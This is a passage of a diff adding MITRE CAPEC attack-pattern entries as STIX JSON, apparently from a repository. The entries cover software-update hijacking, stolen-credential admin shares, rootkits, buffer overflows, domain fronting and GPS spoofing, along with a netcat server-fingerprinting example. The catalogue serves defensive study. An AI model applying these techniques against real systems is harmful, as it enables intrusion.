"\n <xhtml:p>An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from Apache 1.3.23</xhtml:div>$ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1</xhtml:div>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from IIS 5.0</xhtml:div>$ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133</xhtml:div>\n <xhtml:p>[R.170.2]</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack."
],
"x_capec_resources_required": [
"While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."
],
"x_capec_skills_required": {
"Low": "Attacker knows how to send HTTP request, SQL query to a web application."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12.json
+35
View File
@@ -0,0 +1,35 @@
{
"type": "bundle",
"id": "bundle--0fddedd1-6bac-4d38-a77d-21dc06982302",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Malicious Automated Software Update",
"description": "An attacker exploits a weakness in a server or client's process of delivering and verifying the integrity of code supplied by an update-providing server or mechanism to cause code of the attackers' choosing to be downloaded and installed as a software update. Attacks against automated update mechanisms involve attack vectors which are specific to the type of update mechanism, but typically involve two different attack strategies: redirection or spoofing. Redirection-based attacks exploit two layers of weaknesses in server or client software to undermine the integrity of the target code-base. The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update. One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as 'evil twin' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains. The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality. One precedent of redirection-based attacks involves the active exploitation of Firefox extensions, such as the Google Toolbar, Yahoo Toolbar, Facebook Toolbar, and others. The second strategy employed in Automated Hijacking Attacks are spoofing strategies, including content or identity spoofing, as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. Such attacks have numerous precedents, one in particular being eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/187.html",
"external_id": "CAPEC-187"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/494.html",
"external_id": "CWE-494"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87.json
+34
View File
@@ -0,0 +1,34 @@
{
"type": "bundle",
"id": "bundle--c6d3e34f-ef13-45b5-8417-69e56684f0c4",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Windows Admin Shares with Stolen Credentials",
"description": "Windows systems have hidden network shares that are only accessible to administrators and allow files to be written to the local computer. Example network shares include: C$, ADMIN$ and IPC$. Adversaries may use valid administrator credentials to remotely access a network share to transfer files and execute code. It is possible for adversaries to use NTLM hashes to access administrator shares on systems with certain configuration and patch levels.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/561.html",
"external_id": "CAPEC-561"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69.json
+68
View File
@@ -0,0 +1,68 @@
{
"type": "bundle",
"id": "bundle--6035d6a8-f58c-4cc8-8ba4-8cf204370783",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "File Content Injection",
"description": "An attack of this type exploits the host's trust in executing remote content, including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the adversary and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/23.html",
"external_id": "CAPEC-23"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
},
{
"source_name": "reference_from_CAPEC",
"description": "The OWASP Guide Project, The Open Web Application Security Project (OWASP)",
"url": "http://www.owasp.org/index.php/File_System",
"external_id": "REF-88"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.</xhtml:p>\n <xhtml:p>[R.23.2]</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The target software must consume files.",
"The adversary must have access to modify files that the target software will consume."
],
"x_capec_skills_required": {
"Medium": "How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88.json
+43
View File
@@ -0,0 +1,43 @@
{
"type": "bundle",
"id": "bundle--97489e07-c6b8-49e4-b8ba-8d7483fcb84c",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Malicious Hardware Update",
"description": "An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/534.html",
"external_id": "CAPEC-534"
},
{
"source_name": "reference_from_CAPEC",
"description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
"url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf",
"external_id": "REF-439"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_example_instances": [
"An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_skills_required": {
"High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435.json
+47
View File
@@ -0,0 +1,47 @@
{
"type": "bundle",
"id": "bundle--bfe6282f-fc14-410c-a5e2-6de88642542a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2017-01-12T00:00:00.000Z",
"modified": "2017-01-12T00:00:00.000Z",
"name": "Orbital Jamming",
"description": "In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/559.html",
"external_id": "CAPEC-559"
},
{
"source_name": "reference_from_CAPEC",
"description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11",
"external_id": "REF-462"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Availability": [
"Other (A successful attack will deny the availability of the satellite communications for authorized users.)"
]
},
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"This attack requires the knowledge of the satellite's coordinates for targeting."
],
"x_capec_resources_required": [
"A satellite uplink station."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791.json
+45
View File
@@ -0,0 +1,45 @@
{
"type": "bundle",
"id": "bundle--c0e94a45-ed7d-4e88-be0f-19689b33d3cd",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Counterfeit GPS Signals",
"description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/627.html",
"external_id": "CAPEC-627"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Integrity": [
"Modify Data"
]
},
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The target must be relying on valid GPS signal to perform critical operations."
],
"x_capec_resources_required": [
"Ability to create spoofed GPS signals."
],
"x_capec_skills_required": {
"High": "The ability to spoof GPS signals is not trival."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--c3be9d56-c01d-4c3a-b5c1-49c2d8a47805",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)",
"description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/235.html",
"external_id": "CAPEC-235"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb.json
+52
View File
@@ -0,0 +1,52 @@
{
"type": "bundle",
"id": "bundle--898794c0-b30c-4d77-acf8-276b7a726428",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2014-06-23T00:00:00.000Z",
"name": "Expanding Control over the Operating System from the Database",
"description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/470.html",
"external_id": "CAPEC-470"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/250.html",
"external_id": "CWE-250"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/89.html",
"external_id": "CWE-89"
},
{
"source_name": "reference_from_CAPEC",
"description": "Bernardo Damele Assump \u00e7\u00e3o Guimar\u00e3es, Advanced SQL Injection to Operating System Full Control, 2009--04---10",
"url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf",
"external_id": "REF-408"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means"
],
"x_capec_skills_required": {
"High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a.json
+70
View File
@@ -0,0 +1,70 @@
{
"type": "bundle",
"id": "bundle--72ba00ba-f568-451d-8f34-d8ef9a8b0f8b",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Using Alternative IP Address Encodings",
"description": "This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/4.html",
"external_id": "CAPEC-4"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/291.html",
"external_id": "CWE-291"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/173.html",
"external_id": "CWE-173"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Confidentiality": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The target software must fail to anticipate all of the possible valid encodings of an IP/web address.",
"The adversary must have the ability to communicate with the server."
],
"x_capec_resources_required": [
"The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities."
],
"x_capec_skills_required": {
"Low": "The adversary has only to try IP address format combinations."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b.json
+40
View File
@@ -0,0 +1,40 @@
{
"type": "bundle",
"id": "bundle--a94be6f8-63f5-4c7e-a498-7fd3cb113fa7",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Install Rootkit ",
"description": "An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/552.html",
"external_id": "CAPEC-552"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/284.html",
"external_id": "CWE-284"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_example_instances": [
"A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.",
"Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly."
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0.json
+127
View File
@@ -0,0 +1,127 @@
{
"type": "bundle",
"id": "bundle--b1f2f90e-e7d4-4dbe-b303-938d2b994345",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Buffer Overflow via Environment Variables",
"description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/10.html",
"external_id": "CAPEC-10"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/120.html",
"external_id": "CWE-120"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/302.html",
"external_id": "CWE-302"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/118.html",
"external_id": "CWE-118"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/119.html",
"external_id": "CWE-119"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/74.html",
"external_id": "CWE-74"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/99.html",
"external_id": "CWE-99"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/680.html",
"external_id": "CWE-680"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/733.html",
"external_id": "CWE-733"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/697.html",
"external_id": "CWE-697"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
},
{
"source_name": "reference_from_CAPEC",
"description": "Sharefuzz",
"url": "http://sharefuzz.sourceforge.net",
"external_id": "REF-2"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Unreliable Execution",
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Read Data",
"Gain Privileges"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Modify Data"
]
},
"x_capec_example_instances": [
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Attack Example: Buffer Overflow in $HOME</xhtml:div>\n <xhtml:p>A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable.</xhtml:p>See also: CVE-1999-0906",
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Attack Example: Buffer Overflow in TERM</xhtml:div>\n <xhtml:p>A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable.</xhtml:p>See also: CVE-1999-0046"
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The application uses environment variables.",
"An environment variable exposed to the user is vulnerable to a buffer overflow.",
"The vulnerable environment variable uses untrusted data.",
"Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer."
],
"x_capec_skills_required": {
"High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",
"Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--e0a2071a-313b-4c00-b138-e1e0a9e4314a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "DEPRECATED: Pretexting",
"description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/411.html",
"external_id": "CAPEC-411"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf.json
+44
View File
@@ -0,0 +1,44 @@
{
"type": "bundle",
"id": "bundle--971827ed-f84e-40c7-b5bf-ce1dfb7685c0",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2019-04-04T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Contradictory Destinations in Traffic Routing Schemes",
"description": "Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/481.html",
"external_id": "CAPEC-481"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Confidentiality": [
"Read Data",
"Modify Data"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.",
"If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN."
],
"x_capec_skills_required": {
"Medium": "The adversary must have some knowledge of how messages are routed."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f.json
+99
View File
@@ -0,0 +1,99 @@
{
"type": "bundle",
"id": "bundle--3cac3685-e209-4026-824f-9d811b9fdf4c",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Leveraging Race Conditions via Symbolic Links",
"description": "This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to her. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file she will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/27.html",
"external_id": "CAPEC-27"
},
{
